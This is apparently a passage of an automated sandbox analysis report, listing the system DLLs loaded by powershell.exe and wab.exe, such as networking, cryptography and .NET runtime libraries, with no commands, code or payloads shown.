Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: napinsp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: pnrpnsp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshbth.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: nlaapi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: winrnr.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: schannel.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: mskeyprotect.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: ntasn1.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: dpapi.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: ncrypt.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: ncryptsslp.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: rasapi32.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: rasman.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: rtutils.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: dhcpcsvc6.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: dhcpcsvc.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Section loaded: secur32.dll |
Jump to behavior |